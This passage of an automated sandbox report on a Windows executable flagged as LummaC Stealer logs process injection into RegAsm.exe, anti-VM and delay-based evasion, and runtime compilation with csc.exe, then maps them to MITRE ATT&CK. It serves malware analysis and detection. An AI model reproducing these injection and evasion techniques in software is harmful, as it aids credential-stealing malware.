        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00436F90 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,5_2_00436F90
        Source: C:\Users\user\Desktop\htZgRRla8S.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\htZgRRla8S.exe.logJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1868:120:WilError_03
        Source: C:\Users\user\Desktop\htZgRRla8S.exeFile created: C:\Users\user\AppData\Local\Temp\qiobmurjJump to behavior
        Source: htZgRRla8S.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: htZgRRla8S.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        Source: C:\Users\user\Desktop\htZgRRla8S.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: htZgRRla8S.exeReversingLabs: Detection: 55%
        Source: unknownProcess created: C:\Users\user\Desktop\htZgRRla8S.exe "C:\Users\user\Desktop\htZgRRla8S.exe"
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4E1.tmp" "c:\Users\user\AppData\Local\Temp\qiobmurj\CSCE088865CA7FA428F90DCC973FB284B32.TMP"
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline"Jump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4E1.tmp" "c:\Users\user\AppData\Local\Temp\qiobmurj\CSCE088865CA7FA428F90DCC973FB284B32.TMP"Jump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
        Source: htZgRRla8S.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: htZgRRla8S.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: htZgRRla8S.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.pdb source: htZgRRla8S.exe, 00000000.00000002.2139643170.00000000030D4000.00000004.00000800.00020000.00000000.sdmp
        Source: htZgRRla8S.exeStatic PE information: 0xC45C35F2 [Thu May 24 08:50:58 2074 UTC]
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline"
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00446061 push edx; retf 5_2_00446062
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043CA60 push eax; mov dword ptr [esp], 11102FFEh5_2_0043CA63
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00445A2E push esi; ret 5_2_00445A31
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00442543 push esp; retf 5_2_00442549
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00446EA4 push edi; iretd 5_2_00446EA5
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00439F70 push eax; mov dword ptr [esp], 60616263h5_2_00439F7F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.dllJump to dropped file
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Yara detected AntiVM3
        Source: Yara matchFile source: Process Memory Space: htZgRRla8S.exe PID: 4144, type: MEMORYSTR
        Source: C:\Users\user\Desktop\htZgRRla8S.exeMemory allocated: 1800000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeMemory allocated: 3030000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeMemory allocated: 5030000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.dllJump to dropped file
        Source: C:\Users\user\Desktop\htZgRRla8S.exe TID: 3576Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exe TID: 2520Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5312Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5312Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\htZgRRla8S.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: RegAsm.exe, 00000005.00000002.2179497221.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
        Source: RegAsm.exe, 00000005.00000002.2179542666.0000000000DC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: htZgRRla8S.exe, 00000000.00000002.2139187988.000000000149B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0043B480 LdrInitializeThunk,5_2_0043B480
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        .NET source code references suspicious native API functions
        Source: 0.2.htZgRRla8S.exe.5570000.1.raw.unpack, Engineers.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
        Source: 0.2.htZgRRla8S.exe.5570000.1.raw.unpack, Engineers.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
        Source: 0.2.htZgRRla8S.exe.5570000.1.raw.unpack, Engineers.csReference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)
        Allocates memory in foreign processes
        Source: C:\Users\user\Desktop\htZgRRla8S.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
        Compiles code for process injection (via .Net compiler)
        Source: C:\Users\user\Desktop\htZgRRla8S.exeFile written: C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.0.csJump to dropped file
        Injects a PE file into a foreign processes
        Source: C:\Users\user\Desktop\htZgRRla8S.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
        Writes to foreign memory regions
        Source: C:\Users\user\Desktop\htZgRRla8S.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000Jump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 442000Jump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000Jump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 453000Jump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: AED008Jump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline"Jump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4E1.tmp" "c:\Users\user\AppData\Local\Temp\qiobmurj\CSCE088865CA7FA428F90DCC973FB284B32.TMP"Jump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeQueries volume information: C:\Users\user\Desktop\htZgRRla8S.exe VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\htZgRRla8S.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Yara detected LummaC Stealer
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected LummaC Stealer
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Windows Management Instrumentation        		1
        DLL Side-Loading        		411
        Process Injection        		1
        Masquerading        		OS Credential Dumping1
        Security Software Discovery        		Remote Services1
        Screen Capture        		11
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Native API        		Boot or Logon Initialization Scripts1
        DLL Side-Loading        		1
        Disable or Modify Tools        		LSASS Memory31
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Archive Collected Data        		11
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
        Virtualization/Sandbox Evasion        		Security Account Manager22
        System Information Discovery        		SMB/Windows Admin Shares2
        Clipboard Data        		3
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
        Process Injection        		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture124
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information        		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
        Obfuscated Files or Information        		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Timestomp        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

